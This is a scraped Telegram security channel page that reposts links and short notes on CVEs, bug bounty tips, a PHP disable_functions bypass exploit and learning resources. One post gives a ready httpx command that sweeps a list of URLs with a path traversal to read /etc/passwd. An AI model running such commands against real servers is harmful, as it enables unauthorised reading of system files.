NEW BOT Телеграм, страница - 149572281

HackerOne

11K subscribers

644 photos

31 videos

79 files

2.74K links

Community : @Sec0x01
@Bug0x

Download Telegram

About

Blog

Apps

Platform

11K subscribers

Forwarded from Security Analysis

⭕️ PHP 7.3-8.1 disable_functions bypass using string concatenation

PHP 7.3-8.1 disable_functions bypass [concat_function]This exploit uses a bug in a function that handles string concatenation.
A statement such as $a.$b might result in memory corruption if certain conditions are met.
The bugreport provides a very thorough analysis of the vulnerability.
The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.

https://github.com/mm0r1/exploits/tree/master/php-concat-bypass
#PHP #bypass #disable_functions
@securation

2.29K viewsAdel, 14:43

2.28K viewsAmir Kiani, 05:55

https://twitter.com/1rpwn/status/1479738258833690624

Nginx Path Traversal httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:' #bugbountytips #BugBounty #0day #nuclei

2.6K viewsAdel, 08:54

Forwarded from CTF Community | Hints

How I Get $1350 From IDOR Just Less 1 hours

#Web
@ctfplay

2.17K viewsAdel, 10:49

Remote Desktop Client / Server on PowerShell

https://github.com/DarkCoderSc/PowerRemoteDesktop

#pentest #redteam #git

GitHub - PhrozenIO/PowerRemoteDesktop: Remote Desktop entirely coded in PowerShell.

Remote Desktop entirely coded in PowerShell. Contribute to PhrozenIO/PowerRemoteDesktop development by creating an account on GitHub.

2.69K viewsAdel, 11:00

Forwarded from InfoSec/IT pics out-of-context

2.48K viewsН Е К И Б Е Р Л Е О, 13:57

https://mobile-security.gitbook.io/mobile-security-testing-guide/

3.04K viewsAmir Kiani, 22:43

https://letsdefend.io/blog/how-to-create-home-lab-for-log4j-exploit/

Blue Team Blog - LetsDefend

Cyber security blog about SOC Analyst, Incident Responder, and Detection Engineer for blue team training.

3.01K viewsAdel, 14:12

https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html

2.89K viewsAdel, 10:31

https://github.com/croemheld/hacking-art-of-exploitation

GitHub - croemheld/hacking-art-of-exploitation: Source files and summarized reports for some of the chapters and examples in the…

Source files and summarized reports for some of the chapters and examples in the book. - croemheld/hacking-art-of-exploitation

2.92K viewsAdel, 10:54

https://youst.in/posts/cache-poisoning-at-scale/

2.94K viewsAmir Kiani, 13:44

https://github.com/wtsxDev/reverse-engineering

GitHub - wtsxDev/reverse-engineering: List of awesome reverse engineering resources

List of awesome reverse engineering resources. Contribute to wtsxDev/reverse-engineering development by creating an account on GitHub.

2.61K viewsAmir Kiani, 22:16

https://github.com/qazbnm456/awesome-web-security

GitHub - qazbnm456/awesome-web-security: 🐶 A curated list of Web Security materials and resources.

🐶 A curated list of Web Security materials and resources. - qazbnm456/awesome-web-security

😍1

2.92K viewsAmir Kiani, 22:17

https://seclists.org/oss-sec/2022/q1/54

oss-sec: Linux kernel: Heap buffer overflow in fs_context.c since version 5.1

3.21K viewsAmir Kiani, 22:17

IOMobileFrameBuffer vulnerability in iPhone 6s and later (until iOS 15.3) has been actively exploited (CVE-2022-22587)

Impact: A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited
https://support.apple.com/en-us/HT213053

About the security content of iOS 15.3 and iPadOS 15.3

This document describes the security content of iOS 15.3 and iPadOS 15.3.

2.72K viewsAdel, 08:48

https://medium.com/@vflexo/cve-2021-38314-leads-to-sensitive-information-disclosure-6e822784034f

CVE-2021–38314 Leads to Sensitive Information Disclosure

2.64K viewsAmir Kiani, 18:47

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

2.66K viewsAmir Kiani, 19:57

vApi
https://github.com/roottusk/vapi

GitHub - roottusk/vapi: vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top…

vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios through Exercises. - roottusk/vapi

3.09K viewsAmir Kiani, 22:44

https://krebsonsecurity.com/2017/06/why-so-many-top-hackers-hail-from-russia/

Krebs on Security

Why So Many Top Hackers Hail from Russia

Conventional wisdom says one reason so many hackers seem to hail from Russia and parts of the former Soviet Union is that these countries have traditionally placed a much greater emphasis than educational institutions in the West on teaching information…

2.71K viewsAmir Kiani, 22:17

https://hshrzd.wordpress.com/how-to-start/

hasherezade's 1001 nights

How to start RE/malware analysis?

Many people approach me asking more or less the same questions: how to start RE, how to become a malware analyst, how did I start, what materials I can recommend, etc. So, in this section I will co…

2.9K views0xEhsan, 10:22

https://github.com/carlospolop/PurplePanda

GitHub - carlospolop/PurplePanda: Identify privilege escalation paths within and across different clouds

Identify privilege escalation paths within and across different clouds - carlospolop/PurplePanda

2.67K viewsAmir Kiani, 03:31